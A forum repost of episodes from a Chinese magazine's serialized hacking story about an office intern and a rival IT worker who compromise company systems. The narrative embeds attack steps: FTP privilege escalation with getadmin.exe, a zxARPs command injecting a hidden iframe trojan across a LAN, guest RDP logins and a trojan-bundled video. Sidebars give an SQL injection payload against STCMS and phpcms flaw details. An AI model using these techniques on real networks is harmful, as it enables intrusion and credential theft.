老会计正等着他,口气不善:“这几天上网速度特别慢,我听说是信息中心的人做了限制,你知道是谁吗?”
“有这种事情?我没有听胖哥说起,可能是误会……”
“哼!你帮我解决一下,这个速度太慢了。”
汗水从毒辣辣的额头不断往外冒,他装模作样的在电脑中捣鼓了一阵,眼睛不断的向紫衣MM求助,一会儿,重启电脑后老会计电脑的上网速度恢复了正常。4 ~$ i$ n5 D: J2 |: D* J1 a
“你回去跟胖子说说,好好约束一下手下的人,上班时间乱来影响我工作,你们付得起责任吗?”
暗渡陈仓" u6 [- `- B+ j&&t) X7 P+ p8 l
逃离财务室的毒辣辣,还没有喘一口气,眼前就蹦出紫衣MM,她压低声音说道:“你没有提到我吧?”$ G' Z: I, t2 G1 X8 v8 Y" i
“都是你惹的祸!我敢隐瞒吗?”' f4 e( F8 w1 j) W. K; W( v5 g) z
“你出卖我……”
“别打别打!我开玩笑的,别当真!”&&M( B- B+ T# `$ n7 S5 G
“现在怎么办?你给我的工具不能再用了,但如果不用网速又非常慢,我可不甘心!”; Z9 \6 f! J! l) B3 v
“上班时候偷菜是不对的,别偷了。”
“那上班时候下载电影就对了?她不过资格老点,不好明着说她……”
毒辣辣一个头有两个大,这个难题不好解决。如果自己不给P2P终结者,就不会有这个麻烦,毒辣辣开始打退堂鼓,想找个理由脱身,不过看到紫衣MM期盼的双眼,道口的话又吞了回去。. c$ [8 B! M9 O# H
“你要偷菜,老会计要下载电视剧,要你们和平共处的确好难。不过,也不是没有方法,如果我办成了,有什么奖励没有?”
“你办好了,我给你一盒巧克力!”1 y4 V& x( ]6 Z
“不行,你要请吃饭”' b9 e$ v" Q" j+ {0 Z/ o) S* {2 Q
“行,我请你吃小面!”
“……”, z: q4 H6 }" Z3 q
毒辣辣回到自己的座位,在电脑中查看了一下胖哥给自己的工作资料,眼前一亮:“我果然没有记错,真的有一台半闲置的FTP服务器。”原来,公司局域网内一台备用的FTP服务器,它直接跟三层交换机相连,平时就充当一下总务室的打印服务器,工作负荷非常小。, F+ W& `: w7 T4 Y. H+ k
“如果我控制该服务器,就可以利用它来下载电视剧等东东,嘿嘿!”毒辣辣为自己的这个想法而得意。自己没有FTP服务器的管理权限,这件事又不能让胖哥帮忙,只能偷偷的干,于是毒辣辣调出黑客工具,开始了入侵大计。
通过简单的扫描和分析,毒辣辣断定FTP服务器没有禁止Guest账号,且匿名权限为“写入”,看来这台FTP服务器管理不善,还有这样的漏洞。毒辣辣放弃了寻找漏洞入侵的方法,直接通过匿名入侵FTP服务器。3 g5 p' }4 o/ F2 p4 Y7 r: e
他在“运行”里输入cmd, 接着输入 “ftp 192.168.2.45”,它是FTP服务器的IP地址,然后通过cd命令进入scripts目录,接着上传FTP提权工具,在浏览器中输入http:// 192.168.2.45/scripts/getadmin.exe?iusr_phoenix-r,如果返回CGI Error提示,则表示提权成功,接下来就是创建一个拥有管理员权限的专用账号。
利用该账号,毒辣辣通过FTP软件成功登录了FTP服务器,在服务器里面调用迅雷下载老会计喜欢的电视剧,下载速度比财务室的快得多。如此一来,毒辣辣即获得紫衣MM的欢心,又消除了与老会计的误会,可谓一箭双雕!: r( q) y, y. |* `; P
: N! f/ r( R6 n* z' `# h' Q" h
胖哥的举报
“小样,技术确实不错,可惜……”毒辣辣入侵FTP服务器的全部过程,胖哥通过木马的屏幕监控功能看得清清楚楚、仔仔细细,并把整个过程录制下来。此外,胖哥还登录了FTP服务器,在安全日志找到了毒辣辣的IP地址和创建的账号。&&W! `( H. {5 |; l6 r$ T0 m* x$ Z
五点半,正是公司下班时间,一个臃肿的身影幽灵般闪进了主任办公室,拦住了正要下班的主任:“主任,我向你汇报一个事情,新来的员工毒辣辣可真不简单,我怀疑你的笔记本电脑系统登录故障就是他在捣鬼……”
胖哥把毒辣辣擅自使用非法软件扰乱局域网,入侵FTP服务器私自下载电影等行为添油加醋地说了一遍,不失时机地把这些事情上升到目无领导、胡作非为、违反规定的高度,
主任从最初的不信,再到怀疑,最后看到证据后彻底愤怒了……
可怜的毒辣辣,又将面临什么挫折呢?下集不容错过。
社会不同于学校,同事有别于同学,本期中毒辣辣的悲剧值得很多职场新手反思。作为职场新人,一定要尽快养成按程序办事,遵守规章制度的习惯,特别是对分工负责、逐级汇报、归口管理、请示汇报等日常的办公规范,要认真遵守,避免不必要的麻烦。更不能凭着一股热情和冲动,违背工作纪律和组织原则,好心办错事。
毒辣辣为了讨好MM,擅自在局域网内卖弄黑客技术,虽然初衷是好的,但方式方法却不太恰当,既容易让领导误解,又容易被别有用心的人陷害。正确的方法,应该是将局域网存在的问题、影响及危害、解决的方案先向胖哥、再向主任报告,在领导同意的情况下再操作,就不会出现这样的麻烦了。
2 f( ^; `- B: c4 Y3 {- J* M
& & & & 每期故事中的技术,我们都会在电脑报报官方论坛数动连线()安全板块中,邀请黑客营的高手进行深入的挖掘,他们是在什么情况下使用这些黑客技术的,使用过程中可能会出现什么问题,应该如何解决,精彩不容错过!+ a1 [& w( O&&|6 c5 u&&{0 a
上期技术题目的答案是ARP欺骗。有上万人通过论坛、邮件、QQ群和手机四条途径参与了竞猜,产生了一批幸运获奖者,获奖名单请登录查询。
技术题目:FTP服务器常见的入侵方法有几种?' u8 C% s+ H( ]7 R, \2 T% E: O1 e
剧情题目:胖哥为什么总是针对毒辣辣( 附上分析)?7 C) Q2 F&&_: V% _' z, N
想知道答案,请看黑黑求职记(5)。如果你想到答案了,请到留言或者发邮件到,答对者将有机会获得我们送出的2GB防病毒闪存。# G" a' [9 M/ i" F3 K$ T! J
2 @: L9 Z8 T7 k' m. X* h% v4 F! b
& & & & 黑白配,男生女生配,在他们的电脑安全生活中,在攻与防中,爆笑无处不在。欢迎投稿或者提供创意,有丰厚的奖励等着你,来稿请寄。
. V4 G# u/ ?2 q& H" d( f
黑暗竞技场2 [: l4 E5 v( P5 |8 |
& & & & 传说,在云之彼端有一座黑暗竞技场,在竞技场里面可以随意施展黑客技术。每逢虎年,竞技场将打开大门,迎接新的勇士。来吧,来竞技场吧,来一展你的身手吧!在这里,你可以施展黑客技术;在这里,你可以与高手交流。Let’s go!
9 X, {+ h# @& W; `; R- R
最近,phpcms2008 sp4网站管理系统爆出下载任意文件漏洞,该漏洞泄露网站的敏感数据,导致网站被黑客入侵。漏洞的出现是因为“if(preg_match(''/\.php$/'',$f) || strpos($f, &:\\&)) showmessage(''地址有误''); 只判断文件后辍 PHP。如果是“xx.php ”, 多了一个空格的情况,也会被认为是 xx.php文件。! T7 s) h# g, v3 _: t1 q5 s
该漏洞到底如何利用?漏洞利用的具体方法是什么?大家可以将自己的研究心得发送到电脑报官方论坛数动连线()安全板块,也可以直接写信与小编交流,来信请发到。每周我们都会挑出幸运者,赠送每人一份奖品。此外,还有机会在报纸上得到推荐。
& & & & 本期奖品是安天木马防线KEY和USB连接器,奖品由安天提供,价值30元或300X币。
提高发帖质量,建设交流社区
TA的每日心情开心 08:29签到天数: 355 天[LV.8]以坛为家I
毒辣辣求职记(5). M6 k% @' w( a- k7 p& [2 {
毒辣辣初入职场,就得到主任的赏识,受到老同事胖哥的嫉妒,从而处处受到他的刁难。胖哥恶人先告状,诬陷毒辣辣在局域网里面兴风作浪,主任最终是否相信胖哥,处罚毒辣辣呢?毒辣辣又会如何应对从天而降的厄运呢?( \0 ?4 _: d5 b% C) }# O' K" ~0 ]
连载地址:
% s9 O' n9 }3 m5 }( C7 L" X4 b
&&逼到悬崖边缘
故事主角:毒辣辣
其他人物:胖哥(老资格的同事)、主任(直接领导)
本期知识点:ARP挂马攻击+ Y* m&&Q# `. E&&z; c0 {
0 W: k9 W$ V) J
故事提要:逐步冷静的毒辣辣面对胖哥的陷害,据理力争、妙语辩解,暂时化解了主任的信任危机。面对对手的咄咄逼人,毒辣辣决定针锋相对、采取措施找出胖哥入侵主任笔记本电脑的证据,为自己讨回公道。前途是光明的,道路却总是曲折的……' e+ s1 u% Q5 w- P% l&&J, K
戳穿阴谋7 M* W" \% i& v) R, V! g8 A$ {) B
主任毕竟是老江湖了,短暂的愤怒之后,逐渐冷静下来。主任认为不能单听胖哥的一面之词,于是利用胖哥外出的时机,把毒辣辣秘密地叫到自己的办公室,想全面的了解一下情况。7 g, l7 A, H; [: }
“毒辣辣,听说你最近很受财务室的欢迎!”
“我帮财务室的老会计解决了上网速度慢的问题……”
“就这样,没做其他的?听说你私自将公司的备用FTP服务器,改成影音下载服务器,是不是有这回事?”& n" a- R$ r8 Y: A( ]. i
毒辣辣一听主任说话的语气和话题,就感到大事不妙,自己入侵FTP服务器的事情被人打“小报告”了,可整个操作自己做得不知不觉,到底是谁出卖了自己?是老会计?不会!是紫衣MM?更不会!
冷汗从毒辣辣的额头不断往外冒,暗道:“如果今天解释不清楚,自己就完蛋了!”
“主任,其实这件事情,我一直想向你汇报,但由于你工作太忙,我还没有来得及汇报。我来公司这段时间,发现工作节奏很快,公司管理严格,很多公司员工有很大压力,容易导致情绪焦躁,长此以往会出大问题的,我想我们信息中心在这方面可以发挥优势,建立一个影音点播系统,供公司员工休息时候娱乐,为大家创造一个放松的环境……”) o6 j5 `) R&&h* P1 }/ u
“这样吗?”主任的手指有规律的轻轻地敲着桌子,脸上没有透露出喜怒哀乐,“毒辣辣,你觉得奇怪不,你才来我们公司,我的笔记本电脑就出问题了……你说有人在我的笔记本电脑里面建立了隐藏账号,那人是谁?你找到了吗?”9 Y1 r# B5 W# n* Q6 n/ t! W
毒辣辣的心一下子又紧了,为什么主任会怀疑我?是胖哥!此时,毒辣辣一切都明白了,胖哥一定是恶人先告状,刷他很!毒辣辣深吸一口气,冲着主任微微一笑:“主任,隐藏账号的事情,你除了告诉我,没有告诉别人吧?”, |8 X; @( H) W8 h$ E/ Z9 H4 `' b( n
“那是当然。”
“那向你告密的那人怎么知道隐藏账号的事情?这不是‘此地无银三百两’吗?再说,隐藏帐号创建的时候,我还不认识你呢!”/ I8 e% d# p2 ~8 C5 b2 r2 J1 _
毒辣辣一下抓住胖哥栽赃的破绽,让主任陷入了沉思。
毒辣辣继续说道:“主任,FTP服务器的事情是我做得不对,没有及时汇报,还请你谅解。你笔记本电脑中的隐藏账号,我一定会尽快查清楚,掌握实质证据后向你汇报……”
听了毒辣辣的解释,主任依然毫无表情,他点点头:“你先出去吧!”
回到办公室,毒辣辣端起水杯,猛灌了一气,终于感觉不到主任的压力了,他坐下后回忆着此前的对话:“打小报告的人一定是胖哥,可为什么他知道我入了FTP服务器,他有没有千里眼。等等,难倒是他在我的电脑中种植了木马?”: h% m: E9 U- q% h' [/ o
毒辣辣调出嗅探工具,利用该工具来分析自己电脑与外面的所有通信。很快毒辣辣就发现了一个可疑的通信,通过深入的分析,发现通信的IP地址应该是信息中心的。到此,毒辣辣彻底明白了是谁在捣鬼。
现在当务之急是要揪出木马,毒辣辣在安全模式下调用杀毒软件进行全盘查杀,扫描结束后,一个病毒也没有找到,看来木马进行了免杀,逃过了杀毒软件的查杀。毒辣辣哼了一声,调出安全辅助工具,不多久就揪出了木马。7 Q/ A: I2 c&&^1 X0 A0 W: |
满腔怒火的毒辣辣:“养鸟的居然被鸟耍了!”,他调出扫描工具,输入此前查到的IP地址,进行远程分析。胖哥电脑的安全防护做的还是不错,拦截了Ping命令,关闭了等高危端口,远程溢出工具也没有作用。/ ]0 H: C/ M7 C; ~% W: v6 H3 k* f
“胖哥电脑防范的如此严密,常规的入侵方法看来是不行了,我的想想其他的招!”
6 ~: j7 Q9 K# o&&`5 I
毒辣辣还有没有考虑好用什么方法入侵胖哥的电脑,又接到主任的电话去他的办公室。: ]) k5 Z5 r: `
“上午的网络视频会议因为局域网的ARP问题而中断了几分钟,局域网内的很多电脑打开网页就报警有网页木马,这个事情你知道吧?”
“我好像听说了,主任需要我去调查ARP攻击源吗?”8 b0 ~# e" d- I8 H; V
“不用了,ARP攻击源已经找到了,是你的电脑,你自己看看吧!”
毒辣辣接过分析报告,一看大惊失色,ARP攻击源的IP地址就是自己电脑的,可自己明明没有发动过ARP攻击。毒辣辣看到分析报告末尾的署名,顿时明白是胖哥又一次在陷害自己。, O7 T, b/ A. z, o: I( t: b
原来,上午胖哥找了一个借口支开了毒辣辣一小会,然后选择了一个网页木马生成器,制作了一个网页木马,将网页木马偷偷传入毒辣辣的电脑中,然后在毒辣辣电脑中准备开启HTTP服务。
胖哥下载了一款Web服务器软件Baby Web Server,点击“服务→设置”, 在“网页目录”中添加网页木马位置,再点击“Start”开启HTTP服务。做到这里还没有完,胖哥远程传入ARP欺骗工具zxARPs,然后进入zxARPs目录输入命令:zxARPs.exe -idx 0 -ip 192.168.4.7-192.168.4.222 -port 80 -insert \&&iframe src='; width=0 height=0&\&,192.168.4.3是毒辣辣电脑的IP地址。
由于胖哥的作祟,毒辣辣电脑闯下了大祸,毒辣辣又将如何面对主任,如何解释呢?下集不容错过。
0 A$ j, J# s# m* ~% j
本期主任和毒辣辣的对话十分精彩,从中我们可以得到很多职场经验。5 I4 Y& ~3 J- Y8 V
1.控制情绪。主任做的十分老练到位。在任何时候都是冷静、理性处理问题。切记冲动是魔鬼,尤其是职场新手更要注意这一点。
2.汇报沟通的技巧。职场之中,与领导、同事、客户等的沟通协调是很重要的工作方式方法,职场新手一定要有针对性的进行系统训练。本期毒辣辣在向主任解释过程中,先为自己的行为找到一个合情合理的理由,再抓住破绽、反戈一击,批驳胖哥观点的逻辑漏洞,最后降低姿态、自我检讨,给领导一个下台的台阶。大家可以举一反三,在实际工作中进行训练和应用。
$ K' p" t& w/ H& _' U3 N
交流互动+ X* g) L3 d1 |( P
& & & & 每期故事中的技术,我们都会在电脑报官方论坛数动连线()安全板块中,邀请黑客营的高手进行深入的挖掘,他们是在什么情况下使用这些黑客技术的,使用过程中可能会出现什么问题,应该如何解决,精彩不容错过!: M5 S. ~7 R4 M9 Z' o
上期技术问题的答案是4种。有上万人通过论坛、邮件、QQ群和手机四条途径参与了竞猜,产生了一批幸运获奖者,获奖名单请登录查询。
技术题目:如何定位ARP病毒源?1 K) B* s% B: Q; |* g: J: r/ I8 Y/ S
剧情题目:主任还会相信毒辣辣吗( 附上分析)?4 J; w2 D( l- O5 l* y
想知道答案,请看毒辣辣求职记(6)。如果你想到答案了,请到留言或者发邮件到,答对者将有机会获得我们送出的2GB防病毒闪存。* [, _* `2 s2 c* E% V
&&l3 ?$ K: Z. @
$ ]$ j# l' p&&_
黑白配: h* m8 U$ `" P&&q- p) d
& & & & 黑白配,男生女生配,在他们的电脑安全生活中,在攻与防中,爆笑无处不在。欢迎投稿或者提供创意,有丰厚的奖励等着你,来稿请寄。/ s1 V. j- d% s/ c. `
编写批处理
& & & &&&: H5 a' h: y: E
黑暗竞技场' k# w8 w) B/ t&&}+ a
& & & & 传说,在云之彼端有一座黑暗竞技场,在竞技场里面可以随意施展黑客技术。每逢虎年,竞技场将打开大门,迎接新的勇士。来吧,来竞技场吧,来一展你的身手吧!在这里,你可以施展黑客技术;在这里,你可以与高手交流。Let’s go!
, M. \5 S( t% G
STCMS是由PHP+MySQL开发的音乐系统,该系统在网上被广泛使用。该系统的V3.3版本爆出注入漏洞,黑客利用该漏洞就可以直接获得网站管理员的密码,利用管理员的账号和密码就可以登录网站后台,到了这里,想挂马就挂马、想发钓鱼网站链接就发钓鱼网站链接。8 ]' X1 h- r+ e0 }' L
导致漏洞出现的原因是系统没有过滤$_SERVER,黑客可以伪造$_SERVER[X-FORWARDED-FOR],从而将恶意代码(X-Forwarded-For: 127.0.0.1'',(select pwd from stcms_admin where id =1))#)注入数据库中,从而爆出管理员的密码。+ E7 `" \& [# x* y. [
该漏洞到底如何利用?漏洞利用的具体方法是什么?大家可以将自己的研究心得发送到电脑报官方论坛数动连线()安全板块,也可以直接写信与小编交流,来信请发到。每周我们都会挑出幸运者,赠送每人一份奖品。此外,还有机会在报纸上得到推荐。
& & & & 本期奖品是安天木马防线KEY和USB连接器,奖品由安天提供,价值30元或300X币。
提高发帖质量,建设交流社区
TA的每日心情开心 08:29签到天数: 355 天[LV.8]以坛为家I
毒辣辣求职记(6)( k* x. Z0 a( b, o2 t" O5 }8 C2 f
毒辣辣初入职场,就得到主任的赏识,受到老同事胖哥的嫉妒,一次又一次的设计害毒辣辣。如今主任对毒辣辣的信任已经动摇了,并怀疑毒辣辣心存不轨。面对胖哥泼来的污水,毒辣辣应该如何为自己辩解呢?毒辣辣又该如何翻身呢?
连载地址:9 A/ s8 j0 W- n, |3 K: v% m
&&猎人与狐狸的周旋0 z6 z" G; w0 v: K5 a9 e
故事主角:毒辣辣
其他人物:胖哥(老资格的同事)、主任(直接领导)、紫衣MM(会计)% i/ g. R% ]1 N; V
本期知识点:用黑客工具扫描局域网共享资源
# k3 d) R0 |7 v3 v0 v3 h
故事提要:面对胖哥接二连三的诬陷,毒辣辣感到巨大的压力,主任逐渐对自己丧失了信心,如果自己再不行动,难逃主任的责难不说,实习期满后要想留下来就更不可能了。破釜沉舟的毒辣辣,决定展开反击,一场猎人和狐狸的战争开始了……% {" [$ I; ^' T
# D' l2 G/ S3 I& l: N$ `* J
最后一次信任: v& S3 X% @) y
毒辣辣看到手中的调查报告,又惊又怒又恨又悔。惊的是,胖哥为了诬陷自己不择手段,竟敢使用ARP病毒,完全不考虑视频会议是不是会中断;怒的是,胖哥不但不指点,还处处为难自己;恨的是,自己没有早点动手,找到胖哥入侵主任笔记本电脑的证据,导致现在处处受制;悔的是,自己已经清除了电脑中的木马,不然还可以展示给主任看,让主任知道自己的电脑是被远程操控发动ARP攻击的,现在有口也说不清楚了。
“毒辣辣,我希望你给我一个合理的解释,为什么ARP攻击源是你的电脑?”主任阴沉着问道,“你千万不要告诉我,是电脑中毒导致的。我问了,用ARP方式在局域网挂马一定要精心策划。”! n4 Q: o% W5 m
“主任,我是被陷害的,我……”
“谁陷害你,又是胖哥?”
“我认为……”
“你有什么证据说是胖哥陷害你?”) e* t! k$ r& {" f3 l
“主任,假设真是我做的,我在释放病毒的时候,会留下这么明显的痕迹吗?我一定会进行善后工作的。就算用自己的电脑发动攻击,IP地址我也一定会改的。再说,我发动攻击的目的是什么?我又能从中得到什么好处?”3 E% v% R6 _" U# ?0 w0 ?. s1 s
而且这接二连三的诡异事件,都发生在一个实习生头上,主任也觉得有问题,但胖哥一直是信息中心的权威,他的话主任也不能不信。
主任摘下眼镜,冷冷地说:“我再给你一次机会,再相信你一次,你拿出证明你清白的证据。我不能想这些事情再牵扯信息中心过多的时间和精力,你明白吗?这是最后的机会!”
毒辣辣从主任严厉的话语中感受到了压力和危机,自己已经没有什么退路了,只能发挥自己的聪明才智,放手一搏了,为了自己的清誉,为了实习期满可以留下来工作,为了紫衣MM那甜美的笑容……
为“狐狸”挖的陷阱
& & & & 上次扫描胖哥的电脑,基本上没有发现可利用东东,毒辣辣坐在座位上想其他的方法。用木马是最好的方法,可怎么让胖哥中招却是难题,传送文件?NO,胖哥一定不会上当的。网页挂马?太复杂了。到底怎么办呢?毒辣辣陷入沉思。% k% g% L/ B4 K1 _3 f
& & & & “毒辣辣,听说你挨骂了,到底什么事搞得这么惨?”紫衣MM在QQ上询问毒辣辣。2 I1 \' y& [! ~. m) @( k
& & & & “被人陷害了,我正在想方法对付他!”; g$ Z% }" G4 n8 H' _5 p- H
& & & & “找到方法了吗?”. j: e$ A" P9 U, h9 ?& s1 U3 p
& & & & “没有!他现在躲在乌龟壳中,我是一筹莫展。”# D5 F8 L- b6 S. B2 M" f
& & & & “你好笨,你不会引他走出乌龟壳吗?”
& & & & 啪!毒辣辣兴奋地打了一个响指,可以挖以一个共享文件的陷阱,等胖哥自投罗网。胖哥管理局域网,说不定会时常扫描共享的文件,复制他感兴趣的东东,节省了下载时间和寻找时间。5 I; h' R' Q3 C* e0 E4 l
这种事情毒辣辣以前在学校的时候经常干,毒辣辣凭直觉判断胖哥也有这个习惯。于是毒辣辣调查扫描工具超级网络邻居,该工具可以局域网内的共享资源,包括FTP中的资源。 输入IP地址段开始扫描,就可以看到软件扫描出来的共享文件和文件夹。7 c4 K8 i' [" \+ ^
经过筛选,毒辣辣锁定了3个目标电脑,它们都有一个共同的特征,那就是都有很多已经完和未下载完的电影、电视剧,毒辣辣决定入侵3个目标电脑分别查找线索。经过2个小时的辛苦,排除了2个目标,只剩下最后一台目标电脑。. x) w7 Q9 m4 n2 ?3 V& J# s
毒辣辣扫描最后一台目标电脑,发现它开启了3389端口,这可省事多了。毒辣辣生了一个懒腰,微笑着登录远程桌面,随意输入几个常见的用户名,例如guest、new,密码为空进行尝试,很看就看到桌面了。
毒辣辣在目标电脑中找到了一个后门,又发现后门经常连接的IP地址,就是胖哥的。终于找到了!毒辣辣深吸一口气,平抑一下激动的心情,决定采用猎人追捕狐狸的办法——在狐狸出没的路径中设下陷阱,出其不意、攻其不备。
毒辣辣想到做到,立即在这台电脑的共享文件夹中伪造了一个捆绑有木马的视频,视频名称取得非常有诱惑力。最后,毒辣辣将自己登录这台机器的痕迹清除干净,悄悄地离去。7 X% _% O- b# n
上套的“狐狸”4 ?# h) M4 v, s( x6 t2 C
接下来两天,风平浪静,工作像往常一样进行,虽然外表看似平静,但毒辣辣却心急如焚,留给自己的时间可不多,主任的耐心都快耗没了,而“狐狸”却还没有上钩。但毒辣辣知道,现在绝对不能自乱阵脚、打草惊蛇,任何的草率行事都可能前功尽弃。
终于,胖哥在周五下午即将下班的时候,访问了这个共享目录,对毒辣辣留下的视频非常感兴趣,他没有任何防备地复制浏览了视频,当他把注意力集中于视频时,隐藏在视频中的木马已经悄然激活,控制了胖哥的电脑,而此时胖哥还浑然不知……
职场之中,说话要讲事实、讲证据,不能无端的猜测和随意的指责。毒辣辣一直拿不出胖哥陷害他的证据,也拿不出胖哥入侵主任笔记本电脑的证据,一直无法让主任完全相信自己,在这方面,毒辣辣吃亏了。( c. Q' Z' i. o* s8 y+ A7 I
人际关系是这样,各项工作也是这样,凡事都要搞清楚、弄准确,不能大而化之想当然。人际关系中的盲目猜测,往往不利于团结,并会给领导留下不稳重、不严谨的印象,而实际工作中的粗心大意,往往给工作带来被动,造成不应该的失误。! d) h" u' d2 V) q% I6 Y% H' I9 X5 u
交流互动5 u# w( e0 }1 s6 v7 u/ Y2 }8 u
& & & & 每期故事中的技术,我们都会在电脑报官方论坛数动连线()安全板块中,邀请黑客营的高手进行深入的挖掘,他们是在什么情况下使用这些黑客技术的,使用过程中可能会出现什么问题,应该如何解决,精彩不容错过!" A) H; J4 s" x/ a&&b( o5 h% i/ o
上期技术问题的答案是通过路由器定位病毒源。有上万人通过论坛、邮件、QQ群和手机四条途径参与了竞猜,产生了一批幸运获奖者,获奖名单请登录查询。
技术题目:如果共享的文件夹加密了,有方法可以PJ吗?
剧情题目:胖哥会识破毒辣辣的伎俩吗( 附上分析)?! N8 V; U6 O( j1 v
想知道答案,请看毒辣辣求职记(7)。如果你想到答案了,请到留言或者发邮件到,答对者将有机会获得我们送出的2GB防病毒闪存。9 L; @* X6 y& v5 b8 P
& & & & 黑白配,男生女生配,在他们的电脑安全生活中,在攻与防中,爆笑无处不在。欢迎投稿或者提供创意,有丰厚的奖励等着你,来稿请寄。! }# ~: X. G2 W- ^. F
2 W, A* m* Y- `& K5 A7 t1 C5 c
0 s9 g&&@! A3 w7 w/ P
黑暗竞技场
& & & & 传说,在云之彼端有一座黑暗竞技场,在竞技场里面可以随意施展黑客技术。每逢虎年,竞技场将打开大门,迎接新的勇士。来吧,来竞技场吧,来一展你的身手吧!在这里,你可以施展黑客技术;在这里,你可以与高手交流。Let’s go!
最近,phpcms建站系统又爆出注入漏洞,该漏洞会导致网站被黑客入侵,影响2.0版本。漏洞出现的原因是,Help.php 文件存在安全检测不严的问题,对黑客提交的数据过滤不严。导致漏洞出现的关键代码如下:( K7 z0 }/ s& k6 b* L8 @# l
//转义处理客户端提交的数据$ f) f3 \2 {2 h0 }6 X
if(!get_magic_quotes_gpc())
& && &&&$_POST& &= stripslashes_deep($_POST);4 _& C& b& U&&o
& && &&&$_GET& & = stripslashes_deep($_GET);+ u&&d, s& Q8 p) s2 P0 V1 m
& && &&&$_COOKIE = stripslashes_deep($_COOKIE);4 A: W: Q% q% `6 A9 R4 Y7 }
该漏洞到底如何利用?漏洞利用的具体方法是什么?大家可以将自己的研究心得发送到电脑报官方论坛数动连线()安全板块,也可以直接写信与小编交流,来信请发到。每周我们都会挑出幸运者,赠送每人一份奖品。此外,还有机会在报纸上得到推荐。
& & & & 本期奖品是安天木马防线KEY和USB连接器,奖品由安天提供,价值30元或300X币。
提高发帖质量,建设交流社区
TA的每日心情开心 08:29签到天数: 355 天[LV.8]以坛为家I
黑客营2 F* b( Z! S3 x$ o$ U/ g
毒辣辣求职记(7)
毒辣辣初入职场,就得到主任的赏识,受到老同事胖哥的嫉妒,他一次又一次地设计陷害毒辣辣。为了证明自己的清白,为了证实自己的猜想,毒辣辣决定入侵胖哥的电脑,一步一步查出真相。调查过程会一帆风顺吗?会碰到哪些困难?
连载地址:! L5 {' L( c, s' r+ g+ w
1 v+ y3 `5 I* G
&&关乎命运转折的发现
故事主角:毒辣辣
其他人物:胖哥(老资格的同事)、主任(直接领导)、紫衣MM(会计)
本期知识点:Word文档的加密和解密" T$ M) i! e" h0 B
% o9 d+ M. C. B- O! F
故事提要:毒辣辣进入公司实习有一段时间了,是时候正式分配任务了,胖哥财务部的网络维护的重任就毒辣辣,他获得了更多接触紫衣MM的机会。毒辣辣在出色完成工作的同时,加紧了对胖哥的调查。工夫不负有心人,毒辣辣在胖哥电脑中有了至关重要的发现……5 D5 J/ v) G. t' I5 u: `
. j" }7 A- h/ o% B) L
委以“重任”' ]- G, B: L6 L( T) B, v. H
尽管出现了许多插曲和桥段,但毒辣辣在信息中心这一段时间出色的表现,还是得到了主任的认可。主任考虑正式让毒辣辣独立负责一块业务,为此特招来胖哥进行商量。# I, R0 |: M& ^0 _4 m
“小胖,毒辣辣来我们这里有一段时间了,你打算这么安排他?”$ ?& d& }& E&&v7 w/ u) B
胖哥一听主任的话,就大致猜到主任的打算,他并不希望给毒辣辣具体的工作,最好毒辣辣打杂到实习期结束走人,既然主任有意让毒辣辣多做一点事情,他也只好顺水推舟,给毒辣辣安排一个正式的任务:“得让毒辣辣那小子干一些吃力不讨好的活!”' K+ _. o) J8 K. Q0 B+ r$ T3 I
“毒辣辣技术水平确实不错,不过,有时喜欢耍点小聪明,有点滑头……”胖哥眯着眼睛,字斟句酌地说道,“毒辣辣此前做事情,有的不错,有的就有欠思考,我建议我磨练磨练,让他先管理咱们中心的设备,你看怎么样?”
“管设备,是不是大材小用了?我看毒辣辣技术不错,让他负责视频会议……”
“主任,这可能有点不太合适。”胖哥听到主任的,感到不妙,主任想对毒辣辣委以重任,这是胖哥不愿意看到的,他可不希望毒辣辣这种“不懂事”的孩子出风头。" U* U( w3 Z4 v7 h. U
“毒辣辣喜欢捣鼓黑客技术,将视频会议这么重要的任务交给他我有点不放心,万一出了岔子,我们可不好交代。”
听到胖哥的回答,主任陷入了沉思,手指有规律地敲打着桌面,眼光盯着胖哥一动不动。胖哥依然露出憨厚的笑容,坦然面对主任的目光。$ h. F$ j2 }; z3 v9 s2 @8 I+ j
“你的担忧不无道理,视频会议这么重要的工作的确不太适合他……”
“主任,要不这样,将18楼的财务室的网络维护交与毒辣辣负责,这两个部门的网络经常出莫名其妙的问题,也可以锻炼一下毒辣辣独自处理时间问题的能力。”# ]! h: I+ ]: X2 p* V, B
“就找你说的办吧!”
9 E* M, C& ]5 Z
可疑的文档
当胖哥通知毒辣辣任务时,毒辣辣就知道胖哥不安好心,在信息中心呆了有一段时间了,他知道财务室的人大多电脑安全知识不强,时不时就有人的电脑中毒,影响局域网,此外少部分人特别喜欢下载电影、电视剧,占用了宽带资源,影响了网速。' O& V! J# c8 M; t3 c8 q2 |
这个任务极难解决,又不容易得到领导的赏识。不过既然任务已经布置下来了,毒辣辣打起十二分精神,准备大干一场。此时,毒辣辣QQ上紫衣MM的头像闪动了。$ K8 j6 R) j& a( b0 d
“听说你以后我们办公室的网络,是不是真的?”
“你怎么知道的?我几分钟前才知道。”7 [- d( W" i, A/ z9 c
“你不看看我是谁。我们办公室的网速太慢,影响我偷菜,你一定要帮我解决!”
“八卦女,放心吧,我一定做到,你还是相信怎么谢我!此外,你帮我收集一下财务室哪些人喜欢下载东东,有哪些人电脑没有安装安全软件。”) W3 _2 t& C3 p4 M
“喵喵……”
有紫衣MM帮忙收集情报,毒辣辣送了一口气,看到胖哥去走廊吸烟,他决定通过植入胖哥电脑中的木马寻找蛛丝马迹,之所以要等胖哥离开电脑,是怕他察觉电脑中有木马。在胖哥电脑搜查时,毒辣辣发现一个特殊的隐藏属性的Word 2003文档,该文档名称是“手册”。双击文档,里面显示的都是乱码。
看到这里,毒辣辣一愣,该文档没有用Word自带功能的加密(图1),也没有使用第三方加密工具加密,竟然用代码加密,这可不好办了。如果是Word自带功能的加密,可以使用Advanced Office Password Recovery(图2)、Word Password Recovery Master之类工具清除密码,它们可以通过暴力PJ、猜解密码等方式得到密码。+ [; \) ^5 d1 R6 [
如果是用第三方工具加密的,PJ的可能性就较低了,但毒辣辣可以通过木马截获胖哥输入的密码。现在怎么办呢?凭直觉毒辣辣肯定这个神秘的Word2003文档是证明自己清白的重要证据,无论如何也要看到里面的内容。8 \/ {- b&&M4 _+ f4 ?
迷惑的信息5 Z, O7 a4 [2 |&&Q
毒辣辣静下来思考,该文档加密的方法一定不会很复杂,用的语言应该是胖哥熟悉的编程语言。经过深入分析,毒辣辣终于确定该文档使用了异或加密,于是着手编写了一个解密代码,代码如下所示:0 t5 _% s- L, }7 W9 W* O
& && &&&private void button_Click(object sender, EventArgs e)
& && &&&{&&L) l( K' N4 o8 G
& && && && &byte key = * * * * ;
